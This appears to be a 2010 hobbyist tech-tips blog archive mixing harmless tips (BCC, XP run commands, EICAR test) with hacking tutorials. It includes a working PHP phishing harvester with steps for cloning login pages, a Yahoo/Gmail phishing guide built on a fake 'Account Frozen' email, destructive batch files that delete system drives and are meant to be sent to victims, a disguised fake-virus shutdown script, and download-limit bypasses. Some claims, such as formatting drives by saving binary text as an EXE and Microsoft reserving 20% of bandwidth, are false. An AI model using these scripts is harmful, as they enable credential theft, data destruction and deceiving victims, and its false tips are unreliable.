NETRDX BLOG : Just Anthing To Everything: April 2010

Friday, April 30, 2010

Benefits of Using BCC While Sending an Email

Almost every user on the Internet sends/receives hundreds of emails per day. However only a handful of them know what is BCC and what are the advantages of using BCC while sending an email. If you are one such Internet user who is unaware of BCC then this is the post that you should definitely read!

What is BCC?

BCC stands Blind Carbon Copy. It refers to the practice of sending an email to multiple recipients without disclosing the individual emails addresses. While sending the same email/message to multiple recipients, it is a common practice for most users to separate the email addresses by using comma or semi-colon and insert all those addresses in the To: filed. When emails are sent in this way, each receiver is able to see the complete list of recipient email addresses to which the same message if being sent to. Unlike To:, the BCC: option allows you to hide the recipients in email messages. In other words, when emails are sent using BCC:, the receiver will not be able to see the list of recipient email addresses. Thus using BCC is a smart way to protect the privacy of the recipients.

Why should you use BCC?

Here are the reasons for using BCC:

Privacy – BCC provides an easy and simple option for protecting the privacy of your recipients. Under many circumstances it is necessary for us send an email without letting the recipients know who else is receiving the same message. Also it is highly recommended that you use the BCC: while forwarding a joke or a funny email to a list of your friends. If you are sending email on behalf of a business or organization, it may be especially important to keep lists of clients, members, or associates confidential. So don’t forget to use BCC: in instances wherever privacy matters.

Respect for you recipients- While forwarding email messages, people often do not bother to remove the list of previous recipients. As a result, messages that are repeatedly sent to many recipients may contain long lists of email addresses. This makes it easy for the spammers to collect and target those emails for spamming.

In order to avoid the risk of spammers, it is necessary that you encourage people/friends to use BCC: while forwarding any message to you. This prevents your email address from appearing in other people’s inboxes thereby keeping yourself less exposed to spammers. You may also refer How to Protect an Email Account from SPAM for more information on spamming.

How to BCC an email message?

Most email clients provide the BCC: option under a few lines below the To: field. All you have to do is just enter the list of recipients in the BCC: field instead of entering in the To: field. You may enter only your own email address in the To: field. Once you do this just hit the Send button.

The moral is that you should use BCC: while sending bulk messages so as to protect the privacy of your recipients.

110 run commands for xp

1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint first
56. Microsoft Syncronization Tool - mobsync

57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify

110. Windows Management Infrastructure - wmimgmt.msc first

Speed up your internet by 20%

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:

Local Computer Policy

then Computer Configuration

then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.

Double click on Limit Reservable bandwidth.

It will say it is not configured,

but the truth is under the 'Explain' tab i.e."By default,

the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection,

but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO.

This will allow the system to reserve nothing,

rather than the default 20%.It works on Win 2000 as well.

Thursday, April 29, 2010

self destructing email

You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.

BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.

BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts

BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking

BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.

BigString is easy to use

BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!

Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.

click here get a free account

Hack Mobile Phones Through Bluetooth

Yes guys it is the mobile bluetooth hacker. It is a software which can be used to hack any mobile phone through bluetooth network. Once connected to a another phone via bluetooth you can do the following:

1) Call from his phone. It includes all call functions like hold etc.

2) Read his messages

3) Read his contacts

4) Change profile

5) Play his ringtone even if phone is on silent

6) Play his songs(in his phone)

7) Restart the phone

8) Switch off the phone

9) Restore factory settings

10) Change ringing volume

Notes:

1.) When connecting devices use a code 0000

2.) At start of programming on smartphones do not forget to turn on bluetooth before start of the application

What else you want

Just go and downlaod it

download

Format a HDD with Notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.

Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.

Save As An EXE Any Name Will Do

Step 3.

Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest

cant spoonfeed

its working

Do not try it on your PC. Don't mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off

Del C:\ *.*
y

save it as Dell.bat

want worse then type the following:

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as a .bat file

Home How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)

First of all you need to create an account in a form handling service. In the registration form enter your email address in the field "Where to send Data" and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com/ and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.

Now follow the following steps :

1.Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com

2.Now press "CTRL+U", you will get the source code of yahoo page. NOw press "CTRL+A" copy all the text.

3.Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML

4.Now open the the file yahoofake.html using noepad, here you ll find a code which starts with

5.Now in place of (form method="post" action="xxxxxxxxxxxxx")

put ur email id instead of xxxxxxxxxx

Now Save the yahoofake.html.

To hack the victim's password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.

First of all upload your page using some free webhosting services.

Tip: Register to those webhost which don't give their own ads and which gives URL of type "your site name.webhost.com". Now select your site name as mail.yahoo.com/support.

You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.

Now send a fake mail from support_yahoo@yahoo.com to the victim's email address with subject " Account Frozen" and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.

After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.

Good Luck !

Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.

6. SQL injection

SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.

Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.

7. Blind SQL injection

These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.

8. Reverse engineering the system

The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.

9. Google hacks

Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code

Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

How to Test the Working of your Antivirus – EICAR Test

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.

1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to myfile.com

3. Now run the antivirus scan on this myfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.

NOTE: Most antivirus will pop-out a warning message in the Step-1 itself.

You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

How to create a Funny Facebook/Orkut Virus

It's been a long time that I have posted any virus making and hacking related article.I was just hanging around for one,and here is what,my search finished on.I will show you how to make a virus which when is runned,will show a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!!."[You can change this text with whatever you want]and then will put its computer on a shutdown timer. This is totally harmless and safe to use.[Don't worry,we know how precious is your Facebook account to you].

So lets begain,as I know you can't control your excitement anymore:

1.Open Notepad.

2.Type the following text ( simply copy & paste)in Notepad

@echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

Note:You can change the text highlighted in red with whatever you want to show.

3.Now save this as Internet Explorer.bat file or whichever browser's name you but don't forget to type .bat immediately after the name.

4.Now right click this Internet Explorer.bat file and click create shortcut.

5.Now right click shortcut icon and click Properties-->Change Icon[In the shortcut tab]--> and choose Internet Explorer icon or any other similar to it.

6.Now delete the original shortcut as created in step 4 and replace it with this one.

7.Now send this to the victim's computer and when he will click on the icon.........

Hope you will freak out your friends. Feel free to share reaction of your friends with us.

Sunday, April 25, 2010

Hack Rapidshare and all other file hosting websites

Universal Share Downloader (USDownloader), also called RapidShare downloader or MyTempDir downloader is actually not a crack or hack program. Instead, Universal Share Downloader is a download manager for automated download a list of files from most popular free uploaders or free unlimited upload files hosting servers such as RapidShare, MegaUpload, YouSendIt, FileFactory and etc.

Normally, if you’re not premium member or paid member or upgraded member of the free unlimited or one-click file hosting, web space and file delivery service, the service will has some limitations when you try to download the files from the server, such as no concurrent parallel download, so you have to download one file after another file has finished downloading. Beside, you’re also limited to certain download bandwidth limit based on time and IP address, download time delay (reserve “download ticket” system and no instant download start) and slower download speed.

AllFiles, Audiofind, Badongo, BestSharing, Come2Store, Datenko, DepositFiles, EasySharing, FileDepartment, FileFactory, FileHD, FileSpace, GetFileBiz, HemenPaylas, HyperUpload, iFolder, MegaShares, MegaUpload, MyTempDir, Quickdump, Rapidfile.fr, RapidShare, RapidUpload, RecFile, SaveFile, Sendmefile, SexUploader, ShareAm, SimpleUpload, Slil, SpbLand, StoreandServe, SupaShare, TurboShare, TurboUpload, UniversalVideo, Upfile, Upload2, Uploading, UploadPort, UploadSend, WebFile, WebFileHost, YourFile, YourFileHost, YourFileLink, YouSendIt and zShare

Note: For proxy servers list, you can download a software called GeoWhere and use GeoWhere to search for available proxy servers on the Internet, and put all the found proxies into a text file. You should use only anonymous proxy, as transparent proxy will reveal your IP address too. Alternatively, several websites has a long list of open public proxy servers that can be used by the USDownloader such as Proxy.6te.net, Proxy.org. Proxy List even allows you to download list of proxy servers in a text file format (remember to download only anonymous or elite proxy by searching for the type before downloading).

Best of all, Universal Share Downloader is a freeware, and no installation needed. Just download the Universal Share Downloader v 1.3.4 Beta 8 zip file , extract it and run the USDownloader.exe. The few limitation of Universal Share Downloader include unable to download normal download links (it works on those file sharing/hosting services only), and it itself yet to support parallel, concurrent and multi-threaded downloading in current (1.3.3) version (to enable it now, you have to launch multiple USDownloader.exe)

Homepage (in Russian): Universal Share Downloader

Download Unlimited from Rapidshare without paying

I knew a lot of us here use Rapidshare to download and share a lot of stuff. It’s quite annoying when we were unable to download for a certain period after downloading a big file. What are going to be shared to day is how to download from Rapidshare using proxy so that you won’t have to face the 1 hour limitation problem again.

The programs that we need are a browser with ability to use proxy. I use Slimbrowser for two reasons:

1) I don’t want to delete my Firefox or IE cache and cookies files.

2) It’s very lite and not a resource hogger

Steps:

1. Download the browser from this location. Install it.

2. Get a proxy list here. This trick requires the usage of proxy server to work. So don’t skip this step. Grab one proxy or more!

3. This is how you are going to setup your proxy

:Click Tools > Proxies > Organize Proxies

- In the Name field, enter something to identify your proxy, for example, Brazil #1

- In the first address field, enter the proxy address you got from Proxy4Free,

for example, 200.162.195.62

- In the second address field, enter the proxy port, for example, 3128

- If you want to set the entered proxy as the default proxy, then click the

Set As Current Proxy button

- Click OK to close the dialog box

* If you want to add more proxies, repeat the steps above again and again.

4. After you have setup the proxy, copy and paste the Rapidshare download link to your

browsers’ address bar, and wait for the Rapidshare page to launch.

5. In Rapidshare website, do the followings:

- Press enter and scoll down to bottom and click the FREE button

- Wait until the counter reaches zero or use any auto-reveal-link-utility

- Copy paste the download link into your favorite download manager, for

example, Flashget

- Download the file happily

Troubleshooting

Note that if Rapidshare gives you error like this;

This IP is not allowed to use free anonymous services.. or Your IP, xxx.xxx.xxx.xxx is downloading a file…

It’s time to use another proxy!!! In Slimbrowser, go to menu, Tools > Proxies and select another proxy you already entered before

6) After downloading a file, don’t forget to clear your trace!

In Slimbrowser go to menu Tools > Internet Options to open the Internet Options applet

Click both Delete Cookies and Delete Files button to wipe out all references to Rapidshare. If you need to download more files, repeat all steps from 1 to 6, and hopefully you’ll be happier than ever.

Tips:

1. Do not choose proxy with port 80

2. Avoid choosing proxies addresses

Hack Rapidshare and Megaupload

Hack Rapidshare and Megaupload

1.Download the software Hide ip platinum from here

Download

Password for RAR file: H.O.O.D.

2.Run it, then it will automatically chose a proxy (ip of a different country) for you. So you can easily download without any restrictions. You just have to change the proxy each time you download.

Bypass Megaupload country slot limit without toolbar, extension

Internet users who live in a country outside the United States would usually get limited country slot error when trying to download files from Mega upload. Mega upload requires the visitors to install the Alexa tool bar to proceed downloading and it will be quite troublesome if we’re using public computer or prefer not to install information gathering software like the Alexa Tool bar. There are several ways to solve this either by using US based proxy or by applying some tweaks to your computer/internet browser which is the most effective method this time. Those tweaks are:

Mozilla Firefox 2.0.0.5 tweak:

1. Go to address bar and type about:config . Press enter

2. Look for general.useragent.extra.firefox using the filter and double click on it

3. Change the default text with this: Firefox/2.0.0.5 MEGAUPLOAD 1.0

Windows Registry tweak (for Internet Explorer 7 and Internet Explorer 6):

1. Open run in the start menu and type regedit. Press enter.

2. in Registry Editor window, go to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Setting\5.0\User Agent\Post Platform]

3. Right click on ‘Post Platform’ and add new string value. Enter “Alexa Toolbar”. Save the registry and restart your computer.

Note: For IE 7.0 the “Post Platform” will be located at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform]

I have Tested it and working. Just try this trick

Automatically Download From Rapidshare Using Chrome

RapidShare Download Helper will automate the download process for you:

- auto-detect countdowns

- auto-start downloads when countdowns are over

Install RapidShare Automatic Downloader: Link

There’s no icon by the address bar and no settings needing to be changed. It just works fine the last time I tried.

Delete Locked Files Which Can’t be Deleted

you have been using a computer, you have ran into one or more of the following messages:

■Cannot delete file: Access is denied.

■Make sure the disk is not full or write-protected and that the file is not currently in use.

■The source or destination file may be in use.

■The file is in use by another program or user.

These are very common messages that occur when attempting to delete files that a particular malware infection put onto your system.

Remove, Move & Delete Locked Files in Windows

FileASSASSIN is an application that can delete any type of locked files that are on your computer. Whether the files are from a malware infection or just a particular file that will not delete – FileASSASSIN can remove it.

Simply download FileASSASSIN from one of the links below. If you selected the portable build, simply unzip and run the application, otherwise run the installer provided.

Start FileASSASSIN and select a file by dragging it onto the text area or select it using the (…) button. Next, select a removal method from the list. Finally, click Execute and the removal process will commence.

Download FileASSASSIN : Link (163.12 KB)

The program uses advanced programming techniques to unload modules, close remote handles, and terminate processes to remove the particular locked file. Please use with caution as deleting critical system files may cause system errors.

Extract RAR Files Without Password Free – Open Locked RAR

you are looking for free softwares to extract rar files without password then here are two simple tools to open locked rar file archives. Simply download them you might jut be able to extract files from password protected Rar files.

Extract Files from Password Protected RAR Files

Winrar Unlock

Unlock locked winrar archive (including SFX) allowing you to modify the content freely. With Winrar archive lock to prevent modification, people cannot change the content/comment in it. Through some patching of few bytes, you are able to modify your archive with ease.

Download Winrar Unlock: Link

RAR Password Cracker

This program is intended to recover lost passwords for RAR/WinRAR archives of versions 2.xx and 3.xx. The program finds by the method of exhaustive search all possible combinations of characters (“bruteforce” method), or using passwords from lists (“wordlist” or “dictionary” method). Self-extracting archives and multivolume archives are supported.

Download RAR Password Cracker: Link

The program is able to save a current state (you can interrupt the program at any time, and restart from the same state later).

Note: Most of the time for password protected RAR files For eg. Heroes.S02.E10.www.Free-Offline.com.rar the password is in the name it self. In this case the password, it is www.free-offline.com

Saturday, April 24, 2010

creating Fake login page

I’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.

1.Select a target website and navigate to their login page.

2.Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)

3.You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.

4.Create a PHP file and name it “phish.php”.

5.Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.

Header("Location: http://www.RealSite.com");

$handle = fopen("list.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL. The HTML code should start with something like this:

7. Once everything is complete, upload the files to a free webhost that supports PHP.

8. That’s it! You’ve just created a phishing page.

UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

Friday, April 23, 2010

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not…….

Just try the following steps and you’ll get a call to your cell phone from your own number.

1. Just give a missed call to this number. You’ll not be charged!

+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number

3. Receive the call.You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.

4. She say’s- Your PIN cannot be processed and the call disconnects..

ANOTHER TRICK

Instead of giving a missed call, just continue calling. The call will not be received and will get disconnected just after a while. But now do you know what happen’s?

You will get a call from the number

+501

Reason behind this trick

God Knows!!

Just try and pass your comments. Tell me whether the second trick worked or not!!

Change IP Address

How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address.

1. Click on “Start” in the bottom left hand corner of screen.

2. Click on “Run”.

3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”.

5. Type “exit” and leave the prompt.

6. Right-click on “Network Places” or “My Network Places” on your desktop.

7. Click on “properties”.

You should now be on a screen with something titled “Local Area Connection”, or something close to that.

8. Right click on “Local Area Connection” and click “properties”.

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.

10. Click on “Use the following IP address” under the “General” tab.

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.

13. Hit the “Ok” button here.

14. Hit the “Ok” button again.You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings.

17. This time, select “Obtain an IP address automatically”.

18. Hit “Ok”.

19. Hit “Ok” again.

20. You now have a new IP address.

Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack.In this case you need to switch off the modem and then switch it on to get the new IP address.

NOTE: All these tricks works only if you have a dynamic IP address.But if you have a static IP address you have no option to change your IP.

What are IP Addresses

